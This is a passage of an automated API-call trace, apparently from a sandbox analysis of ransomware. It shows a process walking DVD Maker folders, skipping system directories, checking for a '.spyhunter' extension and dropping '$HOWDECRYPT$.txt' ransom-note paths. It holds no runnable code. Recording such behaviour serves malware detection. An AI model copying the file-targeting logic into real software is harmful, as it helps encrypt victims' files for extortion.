(lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.740] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png") returned 94 [0092.740] GetProcessHeap () returned 0x2c0000 [0092.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfe) returned 0x381988 [0092.740] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0092.741] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.741] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.741] lstrlenW (lpString="Windows") returned 7 [0092.741] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.741] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.741] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.741] lstrlenW (lpString="System Volume Information") returned 25 [0092.741] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png") returned 85 [0092.741] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.741] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.741] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.741] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png") returned 85 [0092.741] GetProcessHeap () returned 0x2c0000 [0092.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x355980 [0092.741] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0092.741] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.741] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.741] lstrlenW (lpString="Windows") returned 7 [0092.741] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.741] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.741] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.742] lstrlenW (lpString="System Volume Information") returned 25 [0092.742] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png") returned 91 [0092.742] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.742] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.742] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.742] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png") returned 91 [0092.742] GetProcessHeap () returned 0x2c0000 [0092.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x35a260 [0092.742] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0092.742] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.742] lstrcmpiW (lpString1="vintage.png", lpString2="Windows") returned -1 [0092.742] lstrlenW (lpString="Windows") returned 7 [0092.742] lstrcmpiW (lpString1="vintage.png", lpString2="$Recycle.bin") returned 1 [0092.742] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.742] lstrcmpiW (lpString1="vintage.png", lpString2="System Volume Information") returned 1 [0092.742] lstrlenW (lpString="System Volume Information") returned 25 [0092.742] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png") returned 66 [0092.742] StrStrIW (lpFirst="vintage.png", lpSrch=".spyhunter") returned 0x0 [0092.742] lstrcmpW (lpString1="vintage.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.742] lstrcmpW (lpString1="vintage.png", lpString2="_uninstalling_.png") returned 1 [0092.742] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png") returned 66 [0092.742] GetProcessHeap () returned 0x2c0000 [0092.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x358d60 [0092.743] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0092.743] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.743] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.744] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\$HOWDECRYPT$.txt") returned 71 [0092.744] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\$HOWDECRYPT$.txt") returned 71 [0092.744] GetProcessHeap () returned 0x2c0000 [0092.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e200 [0092.744] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0092.744] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.744] lstrcmpiW (lpString1="Performance", lpString2="Windows") returned -1 [0092.744] lstrlenW (lpString="Windows") returned 7 [0092.744] lstrcmpiW (lpString1="Performance", lpString2="$Recycle.bin") returned 1 [0092.744] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.744] lstrcmpiW (lpString1="Performance", lpString2="System Volume Information") returned -1 [0092.744] lstrlenW (lpString="System Volume Information") returned 25 [0092.744] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 59 [0092.744] lstrcmpW (lpString1="Performance", lpString2=".") returned 1 [0092.744] lstrcmpW (lpString1="Performance", lpString2="..") returned 1 [0092.744] GetProcessHeap () returned 0x2c0000 [0092.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0092.744] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*") returned 61 [0092.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.779] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.779] lstrlenW (lpString="Windows") returned 7 [0092.779] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.779] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.779] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.779] lstrlenW (lpString="System Volume Information") returned 25 [0092.779] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\.") returned 61 [0092.779] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.779] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.779] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.780] lstrlenW (lpString="Windows") returned 7 [0092.780] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.780] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.780] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.780] lstrlenW (lpString="System Volume Information") returned 25 [0092.780] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\..") returned 62 [0092.780] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.780] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.780] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.780] lstrcmpiW (lpString1="720x480blacksquare.png", lpString2="Windows") returned -1 [0092.780] lstrlenW (lpString="Windows") returned 7 [0092.780] lstrcmpiW (lpString1="720x480blacksquare.png", lpString2="$Recycle.bin") returned 1 [0092.780] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.780] lstrcmpiW (lpString1="720x480blacksquare.png", lpString2="System Volume Information") returned -1 [0092.780] lstrlenW (lpString="System Volume Information") returned 25 [0092.780] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png") returned 82 [0092.780] StrStrIW (lpFirst="720x480blacksquare.png", lpSrch=".spyhunter") returned 0x0 [0092.780] lstrcmpW (lpString1="720x480blacksquare.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.780] lstrcmpW (lpString1="720x480blacksquare.png", lpString2="_uninstalling_.png") returned 1 [0092.780] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png") returned 82 [0092.780] GetProcessHeap () returned 0x2c0000 [0092.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f418 [0092.780] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0092.780] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.780] lstrcmpiW (lpString1="NextMenuButtonIcon.png", lpString2="Windows") returned -1 [0092.780] lstrlenW (lpString="Windows") returned 7 [0092.780] lstrcmpiW (lpString1="NextMenuButtonIcon.png", lpString2="$Recycle.bin") returned 1 [0092.780] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.780] lstrcmpiW (lpString1="NextMenuButtonIcon.png", lpString2="System Volume Information") returned -1 [0092.781] lstrlenW (lpString="System Volume Information") returned 25 [0092.781] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png") returned 82 [0092.781] StrStrIW (lpFirst="NextMenuButtonIcon.png", lpSrch=".spyhunter") returned 0x0 [0092.781] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.781] lstrcmpW (lpString1="NextMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0092.781] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png") returned 82 [0092.781] GetProcessHeap () returned 0x2c0000 [0092.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f5f8 [0092.781] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0092.781] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.781] lstrcmpiW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="Windows") returned -1 [0092.781] lstrlenW (lpString="Windows") returned 7 [0092.781] lstrcmpiW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="$Recycle.bin") returned 1 [0092.781] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.781] lstrcmpiW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="System Volume Information") returned -1 [0092.781] lstrlenW (lpString="System Volume Information") returned 25 [0092.781] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png") returned 91 [0092.781] StrStrIW (lpFirst="NextMenuButtonIconSubpictur.png", lpSrch=".spyhunter") returned 0x0 [0092.781] lstrcmpW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.781] lstrcmpW (lpString1="NextMenuButtonIconSubpictur.png", lpString2="_uninstalling_.png") returned 1 [0092.781] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png") returned 91 [0092.781] GetProcessHeap () returned 0x2c0000 [0092.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x35a160 [0092.781] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0092.781] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.781] lstrcmpiW (lpString1="Notes_loop.wmv", lpString2="Windows") returned -1 [0092.781] lstrlenW (lpString="Windows") returned 7 [0092.781] lstrcmpiW (lpString1="Notes_loop.wmv", lpString2="$Recycle.bin") returned 1 [0092.781] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.781] lstrcmpiW (lpString1="Notes_loop.wmv", lpString2="System Volume Information") returned -1 [0092.782] lstrlenW (lpString="System Volume Information") returned 25 [0092.782] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv") returned 74 [0092.782] StrStrIW (lpFirst="Notes_loop.wmv", lpSrch=".spyhunter") returned 0x0 [0092.782] lstrcmpW (lpString1="Notes_loop.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.782] lstrcmpW (lpString1="Notes_loop.wmv", lpString2="_uninstalling_.png") returned 1 [0092.782] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv") returned 74 [0092.782] GetProcessHeap () returned 0x2c0000 [0092.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346728 [0092.782] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0092.782] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.782] lstrcmpiW (lpString1="Notes_loop_PAL.wmv", lpString2="Windows") returned -1 [0092.782] lstrlenW (lpString="Windows") returned 7 [0092.782] lstrcmpiW (lpString1="Notes_loop_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.782] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.782] lstrcmpiW (lpString1="Notes_loop_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.782] lstrlenW (lpString="System Volume Information") returned 25 [0092.782] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv") returned 78 [0092.782] StrStrIW (lpFirst="Notes_loop_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.782] lstrcmpW (lpString1="Notes_loop_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.785] lstrcmpW (lpString1="Notes_loop_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.785] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv") returned 78 [0092.785] GetProcessHeap () returned 0x2c0000 [0092.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3782a8 [0092.785] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0092.785] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.785] lstrcmpiW (lpString1="ParentMenuButtonIcon.png", lpString2="Windows") returned -1 [0092.785] lstrlenW (lpString="Windows") returned 7 [0092.785] lstrcmpiW (lpString1="ParentMenuButtonIcon.png", lpString2="$Recycle.bin") returned 1 [0092.785] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.785] lstrcmpiW (lpString1="ParentMenuButtonIcon.png", lpString2="System Volume Information") returned -1 [0092.785] lstrlenW (lpString="System Volume Information") returned 25 [0092.785] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png") returned 84 [0092.785] StrStrIW (lpFirst="ParentMenuButtonIcon.png", lpSrch=".spyhunter") returned 0x0 [0092.785] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.785] lstrcmpW (lpString1="ParentMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0092.785] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png") returned 84 [0092.785] GetProcessHeap () returned 0x2c0000 [0092.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x3553b0 [0092.785] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0092.785] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.785] lstrcmpiW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="Windows") returned -1 [0092.785] lstrlenW (lpString="Windows") returned 7 [0092.786] lstrcmpiW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="$Recycle.bin") returned 1 [0092.786] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.786] lstrcmpiW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="System Volume Information") returned -1 [0092.786] lstrlenW (lpString="System Volume Information") returned 25 [0092.786] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png") returned 91 [0092.786] StrStrIW (lpFirst="ParentMenuButtonIconSubpict.png", lpSrch=".spyhunter") returned 0x0 [0092.786] lstrcmpW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.786] lstrcmpW (lpString1="ParentMenuButtonIconSubpict.png", lpString2="_uninstalling_.png") returned 1 [0092.786] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png") returned 91 [0092.786] GetProcessHeap () returned 0x2c0000 [0092.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x35a260 [0092.786] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0092.786] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.786] lstrcmpiW (lpString1="performance.png", lpString2="Windows") returned -1 [0092.786] lstrlenW (lpString="Windows") returned 7 [0092.786] lstrcmpiW (lpString1="performance.png", lpString2="$Recycle.bin") returned 1 [0092.786] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.786] lstrcmpiW (lpString1="performance.png", lpString2="System Volume Information") returned -1 [0092.786] lstrlenW (lpString="System Volume Information") returned 25 [0092.786] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png") returned 75 [0092.786] StrStrIW (lpFirst="performance.png", lpSrch=".spyhunter") returned 0x0 [0092.786] lstrcmpW (lpString1="performance.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.786] lstrcmpW (lpString1="performance.png", lpString2="_uninstalling_.png") returned 1 [0092.786] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png") returned 75 [0092.786] GetProcessHeap () returned 0x2c0000 [0092.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346d48 [0092.786] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0092.787] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.787] lstrcmpiW (lpString1="Perf_Scenes_Mask1.png", lpString2="Windows") returned -1 [0092.787] lstrlenW (lpString="Windows") returned 7 [0092.787] lstrcmpiW (lpString1="Perf_Scenes_Mask1.png", lpString2="$Recycle.bin") returned 1 [0092.787] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.787] lstrcmpiW (lpString1="Perf_Scenes_Mask1.png", lpString2="System Volume Information") returned -1 [0092.787] lstrlenW (lpString="System Volume Information") returned 25 [0092.787] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png") returned 81 [0092.787] StrStrIW (lpFirst="Perf_Scenes_Mask1.png", lpSrch=".spyhunter") returned 0x0 [0092.787] lstrcmpW (lpString1="Perf_Scenes_Mask1.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.787] lstrcmpW (lpString1="Perf_Scenes_Mask1.png", lpString2="_uninstalling_.png") returned 1 [0092.787] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png") returned 81 [0092.787] GetProcessHeap () returned 0x2c0000 [0092.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f6e8 [0092.787] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0092.787] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.787] lstrcmpiW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="Windows") returned -1 [0092.787] lstrlenW (lpString="Windows") returned 7 [0092.787] lstrcmpiW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="$Recycle.bin") returned 1 [0092.787] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.787] lstrcmpiW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="System Volume Information") returned -1 [0092.787] lstrlenW (lpString="System Volume Information") returned 25 [0092.787] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png") returned 87 [0092.787] StrStrIW (lpFirst="Perf_Scenes_Subpicture1.png", lpSrch=".spyhunter") returned 0x0 [0092.787] lstrcmpW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.787] lstrcmpW (lpString1="Perf_Scenes_Subpicture1.png", lpString2="_uninstalling_.png") returned 1 [0092.787] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png") returned 87 [0092.787] GetProcessHeap () returned 0x2c0000 [0092.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x355790 [0092.787] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0092.788] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.788] lstrcmpiW (lpString1="PreviousMenuButtonIcon.png", lpString2="Windows") returned -1 [0092.788] lstrlenW (lpString="Windows") returned 7 [0092.788] lstrcmpiW (lpString1="PreviousMenuButtonIcon.png", lpString2="$Recycle.bin") returned 1 [0092.788] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.788] lstrcmpiW (lpString1="PreviousMenuButtonIcon.png", lpString2="System Volume Information") returned -1 [0092.788] lstrlenW (lpString="System Volume Information") returned 25 [0092.788] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 86 [0092.788] StrStrIW (lpFirst="PreviousMenuButtonIcon.png", lpSrch=".spyhunter") returned 0x0 [0092.788] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.788] lstrcmpW (lpString1="PreviousMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0092.788] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned 86 [0092.788] GetProcessHeap () returned 0x2c0000 [0092.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x3555a0 [0092.824] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c8) returned 0x2c310e0 [0092.824] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.824] lstrcmpiW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="Windows") returned -1 [0092.824] lstrlenW (lpString="Windows") returned 7 [0092.824] lstrcmpiW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="$Recycle.bin") returned 1 [0092.824] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.824] lstrcmpiW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="System Volume Information") returned -1 [0092.824] lstrlenW (lpString="System Volume Information") returned 25 [0092.824] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png") returned 91 [0092.824] StrStrIW (lpFirst="PreviousMenuButtonIconSubpi.png", lpSrch=".spyhunter") returned 0x0 [0092.824] lstrcmpW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.824] lstrcmpW (lpString1="PreviousMenuButtonIconSubpi.png", lpString2="_uninstalling_.png") returned 1 [0092.824] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png") returned 91 [0092.824] GetProcessHeap () returned 0x2c0000 [0092.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x35a160 [0092.825] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d0) returned 0x2c310e0 [0092.825] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.825] lstrcmpiW (lpString1="redmenu.png", lpString2="Windows") returned -1 [0092.825] lstrlenW (lpString="Windows") returned 7 [0092.825] lstrcmpiW (lpString1="redmenu.png", lpString2="$Recycle.bin") returned 1 [0092.825] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.825] lstrcmpiW (lpString1="redmenu.png", lpString2="System Volume Information") returned -1 [0092.825] lstrlenW (lpString="System Volume Information") returned 25 [0092.825] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD 